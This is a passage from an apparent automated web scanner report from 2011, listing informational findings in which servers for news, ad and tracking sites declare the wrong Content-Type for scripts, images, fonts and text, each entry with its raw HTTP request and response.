Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=500&flashID=myExperience&bgcolor=%23F4F4F4&wmode=opaque&dynamicStreaming=true&videoSmoothing=true&playerID=1055201224001&publisherID=315980433&isVid=true&autoStart=false&isUI=true&allowScriptAccess=always&debuggerID=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:12:44 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 14:35:23 GMT
Content-Length: 49
Content-Type: text/plain

GIF89a...................!.......,...........T..;

29.8. http://imp.fetchback.com/serve/fb/adtag.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The response's Content-type statement says that it contains HTML. However, it actually appears to contain script.

Request

GET /serve/fb/adtag.js?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/6291/9346/15214-2.3214995.3237976?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315096959_34024:68283:1:0:0_34024:68292:2:118796:118878_34023:68293:1:119509:119509; uid=1_1315096959_1314893682667:5756480826433243; kwd=1_1315096959; scg=1_1315096959; ppd=1_1315096959; act=1_1315096959

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:11 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097051_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:44:11 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 293

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/6291/9346/15214-2.3214995.3237976?url=' width='728' height
...[SNIP]...

29.9. http://js.www.reuters.com/recommend/re/fp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://js.www.reuters.com
Path:   /recommend/re/fp

Issue detail

The response's Content-type statement says that it contains plain text. However, it actually appears to contain script.

Request

GET /recommend/re/fp?ed=us&type=article&id=USTRE78222D20110903&howMany=5&callback=Reuters.utils.showRecommendations&refreshUrlTimestamp=1315097053383 HTTP/1.1
Host: js.www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:54 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 00:50:55 GMT
max-age: 300000
Content-Type: text/plain
Content-Length: 1592

if (typeof Reuters.utils.showRecommendations === 'function') {Reuters.utils.showRecommendations([{"assetType":"article","id":"USTRE78225U20110903","score":0.45668233713901946,"headline":"Michigan foot
...[SNIP]...

29.10. http://media.charlotteobserver.com/static/dealsaver/widget/images/dealsaver_td_logo.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://media.charlotteobserver.com
Path:   /static/dealsaver/widget/images/dealsaver_td_logo.png

Issue detail

The response's Content-type statement says that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /static/dealsaver/widget/images/dealsaver_td_logo.png HTTP/1.1
Host: media.charlotteobserver.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Last-Modified: Wed, 08 Jun 2011 19:28:04 GMT
ETag: "5dc716-844-4defcd44"
Accept-Ranges: bytes
Content-Length: 2116
Content-Type: image/png
Date: Sun, 04 Sep 2011 00:44:07 GMT
Connection: close

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......
...[SNIP]...

29.11. http://mediacdn.disqus.com/1314991730/fonts/disqus-webfont.woff

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mediacdn.disqus.com
Path:   /1314991730/fonts/disqus-webfont.woff

Issue detail

The response's Content-type statement says that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /1314991730/fonts/disqus-webfont.woff HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=608614822849; __qca=P0-943627109-1315055753168; __utma=113869458.1840189074.1315055753.1315055753.1315055753.1; __utmz=113869458.1315055753.1.1.utmcsr=frankgruber.me|utmccn=(referral)|utmcmd=referral|utmcct=/post/9680693152/the-view-looking-out-from-techcocktail-boston-at

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 02 Sep 2011 20:23:42 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Access-Control-Allow-Origin: *
Content-Type: text/plain
Vary: Accept-Encoding
Content-Length: 5304
X-Varnish: 1644025771 1634998852
Cache-Control: max-age=2572652
Expires: Mon, 03 Oct 2011 19:41:50 GMT
Date: Sun, 04 Sep 2011 01:04:18 GMT
Connection: close

wOFF...............`........................FFTM...l........Z.V.GDEF........... .Y..OS/2.......E...`t.f.cmap................cvt .......6...6 ...fpgm...........e../.gasp................glyf...........p
...[SNIP]...

29.12. http://rt.disqus.com/forums/realtime-cached.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rt.disqus.com
Path:   /forums/realtime-cached.js

Issue detail

The response's Content-type statement says that it contains script. However, it actually appears to contain plain text.

Request

GET /forums/realtime-cached.js?timestamp=2011-09-03_20:39:40&thread_id=404039983&f=charlotteobserver&1315097121163 HTTP/1.1
Host: rt.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=608614822849; __qca=P0-943627109-1315055753168; __utma=113869458.1840189074.1315055753.1315055753.1315055753.1; __utmz=113869458.1315055753.1.1.utmcsr=frankgruber.me|utmccn=(referral)|utmcmd=referral|utmcct=/post/9680693152/the-view-looking-out-from-techcocktail-boston-at

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 01:05:19 GMT
Content-Type: application/x-javascript
Content-Length: 67
Last-Modified: Mon, 17 Jan 2011 19:57:15 GMT
Connection: close
Accept-Ranges: bytes

DISQUS.dtpl.actions.fire("realtime.update", "2010-12-08_19:48:43")

29.13. http://rt.legolas-media.com/lgrt

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The response's Content-type statement says that it contains script. However, it actually appears to contain plain text.

Request

GET /lgrt?ci=2&ei=9&ti=28&pbi=37 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgtix=/QABADAB

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:45 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=BgABADMBSQABADMBHAACADMBDAABADMB/QABADABXwABADMB; path=/; expires=Wed, 03 Sep 2014 00:48:45 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 5
Connection: close

true;

29.14. http://rtq.careerbuilder.com/RTQ/jobstream.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rtq.careerbuilder.com
Path:   /RTQ/jobstream.aspx

Issue detail

The response's Content-type statement says that it contains HTML. However, it actually appears to contain script.

Request

GET /RTQ/jobstream.aspx?lr=CBMC_SB&rssid=MC_SB_jbstrm&num=&kw=CustomField3:SACBEETJ&cat=All&rad=50&state=&city=&zip=&ddtitle=false&ddcompany=false&sb=[&%20mi_cb_search_box%20&] HTTP/1.1
Host: rtq.careerbuilder.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR35
Date: Sun, 04 Sep 2011 00:44:05 GMT
Connection: close
Content-Length: 6162

// declaration
var cb_jobstream_title;
var cb_jobstream_title_bg
var cb_jobstream_title_font
var cb_jobstream_border;
var cb_jobstream_width;
var cb_jobstream_height;
var cb_jobstream_main_bgco
...[SNIP]...

29.15. http://search.charlotteobserver.com/search-bin/search.pl.cgi

Summary

Severity:   Information
Confidence:   Firm
Host:   http://search.charlotteobserver.com
Path:   /search-bin/search.pl.cgi

Issue detail

The response's Content-type statement says that it contains HTML. However, it actually appears to contain plain text.

Request

GET /search-bin/search.pl.cgi HTTP/1.1
Host: search.charlotteobserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:44 GMT
Server: Apache/1.3.41
Vary: Accept-Encoding
Expires: Sat, 03 Sep 2011 01:23:44 GMT
Mi-app-host: rdds021p
Content-Type: text/html; charset=ISO-8859-1
X-Cache: MISS from search.charlotteobserver.com
Connection: close
Content-Length: 262

<h1>Search Error</h1>
<b>Could not retrieve Error Template.</b><br>
Error template:
<br>
error_template not set.

<p>
<b>Search Error(s)</b><br>
No live_template parameter specified. at /nm/local/mi/
...[SNIP]...

29.16. http://search2.sacbee.com/search-bin/search.pl.cgi

Summary

Severity:   Information
Confidence:   Firm
Host:   http://search2.sacbee.com
Path:   /search-bin/search.pl.cgi

Issue detail

The response's Content-type statement says that it contains HTML. However, it actually appears to contain plain text.

Request

GET /search-bin/search.pl.cgi HTTP/1.1
Host: search2.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:49 GMT
Server: Apache/1.3.41
Vary: Accept-Encoding
Expires: Sat, 03 Sep 2011 01:23:49 GMT
Mi-app-host: rdds017p
Content-Type: text/html; charset=ISO-8859-1
X-Cache: MISS from search2.sacbee.com
Connection: close
Content-Length: 262

<h1>Search Error</h1>
<b>Could not retrieve Error Template.</b><br>
Error template:
<br>
error_template not set.

<p>
<b>Search Error(s)</b><br>
No live_template parameter specified. at /nm/local/mi/
...[SNIP]...

29.17. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The response's Content-type statement says that it contains script. However, it actually appears to contain HTML.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=545853.blog&clientUrl=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Cache-Control: private
Content-Length: 43017
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Sun, 04 Sep 2011 00:44:38 GMT
Connection: close

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...

29.18. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

Summary

Severity:   Information
Confidence:   Firm
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The response's Content-type statement says that it contains HTML. However, it actually appears to contain CSS.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:57 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2; Path=/
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:50:07 GMT
Content-Length: 90
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2"}});

29.19. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sprint.tt.omtrdc.net
Path:   /m2/sprint/mbox/standard

Issue detail

The response's Content-type statement says that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/sprint/mbox/standard?mboxHost=www.sprint.com&mboxSession=1315097027971-178294&mboxPage=1315097027971-178294&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=sprint-interstitial-mbox&mboxId=0&mboxTime=1315079036636&mboxURL=http%3A%2F%2Fwww.sprint.com%2F&mboxReferrer=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dsprint%26date%3D2011-9-3%26sa%3DX&mboxVersion=40 HTTP/1.1
Host: sprint.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315097027971-178294.19; Domain=sprint.tt.omtrdc.net; Expires=Sun, 18-Sep-2011 00:45:30 GMT; Path=/m2/sprint
Content-Type: text/javascript
Content-Length: 179
Date: Sun, 04 Sep 2011 00:45:30 GMT
Server: Test & Target

mboxFactories.get('default').get('sprint-interstitial-mbox',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315097027971-178294.19");

29.20. http://static.mcclatchyinteractive.com/creative/fns/widgets/images/deal_placeholder.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://static.mcclatchyinteractive.com
Path:   /creative/fns/widgets/images/deal_placeholder.jpg

Issue detail

The response's Content-type statement says that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /creative/fns/widgets/images/deal_placeholder.jpg HTTP/1.1
Host: static.mcclatchyinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Last-Modified: Sun, 05 Dec 2010 16:53:13 GMT
ETag: "6fd7df-168e-4cfbc379"
Accept-Ranges: bytes
Content-Length: 5774
Content-Type: image/jpeg
Date: Sun, 04 Sep 2011 00:44:07 GMT
Connection: close

GIF89a..X....Y...Q.Ey.i..1m....-i..R..\..U.4o..Z..b.)f..P..T..N..J..^..V. ^..]..L.:r..X.=u.a..v..!a..Y.T..q..5p.%e..Y.%b..^..\.*h.&d..U.!`..Y.'f.3j..M.._.-j..V.!b..`..N.!d..V.-h..X.0l..Z..G}7q.*h..N..
...[SNIP]...

29.21. http://trc.taboolasyndication.com/reuters/trc/2/json

Summary

Severity:   Information
Confidence:   Firm
Host:   http://trc.taboolasyndication.com
Path:   /reuters/trc/2/json

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain; charset=utf-8. The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /reuters/trc/2/json?tim=19%3A44%3A27.751&publisher=reuters&pv=2&list-size=3&list-id=rbox-t2v&id=353&uim=article&intent=s&uip=article&external=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX&llvl=2&item-id=USTRE78222D20110903&item-type=text&item-url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&page-id=6c870e4113048a2a02755a640f72c25ab23ac976&cv=4-8-2-1-48560-3339640&uiv=default&cb=TRC.callbacks.recommendations_1 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 00:50:47 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097447;Path=/reuters/
Set-Cookie: JSESSIONID=.prod2-f2;Path=/
Set-Cookie: taboola_wv=;Path=/reuters/;Expires=Mon, 03-Sep-12 00:50:47 GMT
Content-Length: 3826

TRC.callbacks.recommendations_1({"trc":{"req":"48e76b6e191407b87e2eaaa3fddbfe40","session-id":"cf5b371b2ea2c82fafb75969374381dc","session-data":"v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-
...[SNIP]...

29.22. http://urls.api.twitter.com/1/urls/count.json

Summary

Severity:   Information
Confidence:   Firm
Host:   http://urls.api.twitter.com
Path:   /1/urls/count.json

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain. The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /1/urls/count.json HTTP/1.1
Host: urls.api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "6599c6d212c5eb6e41d800b7f8bf7397:1284511129"
Last-Modified: Wed, 15 Sep 2010 00:38:49 GMT
Accept-Ranges: bytes
Content-Length: 95
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:25:06 GMT
Connection: close
X-N: S

twttr.receiveCount({"errors":[{"code":48,"message":"Unable to access URL counting services"}]})

29.23. http://video.od.visiblemeasures.com/log

Summary

Severity:   Information
Confidence:   Firm
Host:   http://video.od.visiblemeasures.com
Path:   /log

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /log?m=USM2WGACdk8oUH9yAQgEc3sGCHQKAAp2E1RVJU1AQFwPAGYCcXcHBQBwcgh3BQQJcQVkN0EEAHBzBAl%2FBQYLdA0DBWJdVEZYFwUFQFU0CgATMCNXIVhdcCUJcmYAfAZzcAAOcAMACnMAAwl3CgYUTEFVMQ1wBHF2DHN1f3UHBn9xBnV6c38IdntyDX9zB3oFAgF0AQ13cH92A3oDEiJWRFRnd381VkAEcRItIVhcUjcLVQR3AQYNdAwFAXcIDQcLFwMCARIiVkRUZ3d%2FNUBYBHIEcmYAfARzchddJ0ZWHXFzQlQ3BFZaWEBcLERAI1hSRicwTyBFV1wvUTAqUR9aJjsMWnJUAQp9BFFScA9RAwhXACEBByMHAAR7IAAjBgUOIwFkIEYEAHBzBAl%2FBQYLdQ0HAg%3D%3D&p=1 HTTP/1.1
Host: video.od.visiblemeasures.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=500&flashID=myExperience&bgcolor=%23F4F4F4&wmode=opaque&dynamicStreaming=true&videoSmoothing=true&playerID=1055201224001&publisherID=315980433&isVid=true&autoStart=false&isUI=true&allowScriptAccess=always&debuggerID=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 04 Sep 2011 00:44:53 GMT
Content-Type: text/html
Content-Length: 11
Last-Modified: Tue, 01 Mar 2011 06:21:43 GMT
X-Cnection: close
Accept-Ranges: bytes

objectid=1

29.24. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement: Content-Type: text/html; charset=utf-8. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df337164584%26origin%3Dhttp%253A%252F%252Fwww.sacbee.com%252Ff2cc480d48%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17832e2e4%26origin%3Dhttp%253A%252F%252Fwww.sacbee.com%252Ff2cc480d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df351183554%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df356e68488%26origin%3Dhttp%253A%252F%252Fwww.sacbee.com%252Ff2cc480d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df351183554&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc27dfe64%26origin%3Dhttp%253A%252F%252Fwww.sacbee.com%252Ff2cc480d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df351183554&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3671fd398%26origin%3Dhttp%253A%252F%252Fwww.sacbee.com%252Ff2cc480d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df351183554&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.214.45
X-Cnection: close
Date: Sun, 04 Sep 2011 00:44:20 GMT
Content-Length: 22

Invalid Application ID

29.25. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nbcudigitaladops.com
Path:   /hosted/util/getRemoteDomainCookies.js

Issue detail

The response contains the following Content-type statement: Content-Type: application/javascript. The response states that it contains script. However, it actually appears to contain plain text.

Request

